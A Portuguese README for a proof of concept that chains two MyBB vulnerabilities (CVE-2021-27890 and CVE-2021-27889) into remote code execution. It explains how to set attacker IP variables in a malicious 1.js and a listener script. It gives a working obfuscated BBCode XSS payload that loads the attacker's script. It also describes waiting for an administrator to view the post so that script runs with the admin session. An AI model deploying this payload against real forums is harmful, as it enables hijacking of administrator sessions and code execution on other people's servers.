
Mybb associa CVE-2021-27890 & CVE-2021-27889 a RCE poc
Mybb associa CVE-2021-27890 & CVE-2021-27889 ao RCE poc
Antes de usar:
Há dois arquivos aqui: 1.js e attack_listen.py
Você deve modificar esses dois arquivos:
1.js:
modifique a url do fórum mybb e a url de ataque:
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
attack_listen.py
modifique o host de ataque e a porta de ataque:
attack_host = '192.168.92.165'
attack_port = 8080
Uso:
CVE-2021-27889 é xss. Você deve injetar o seguinte payload em "New Post Thread" ou "Reply" ou "Private Messages" antes de realizar o ataque. Nesta demonstração, enviei o payload para "New Post Thread"
note que o 192.168.92.165 é o ip do servidor malicioso. Você deve alterá-lo.
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]

Agora nosso js malicioso 1.js foi injetado com sucesso. Então devemos esperar que um Administrador visualize esta Postagem com o cookie da página de admin logado.
Observe que o usuário Admin não precisa estar logado na página do fórum.
Enquanto esperamos, devemos executar o "attack_listen.py" em nossa máquina de ataque, para identificar se o usuário Admin foi atacado.
python3 attack_listen.py
Quando o usuário Admin visualizar a postagem maliciosa, o js malicioso realizará o ataque:

Podemos receber as informações em nossa máquina de ataque:

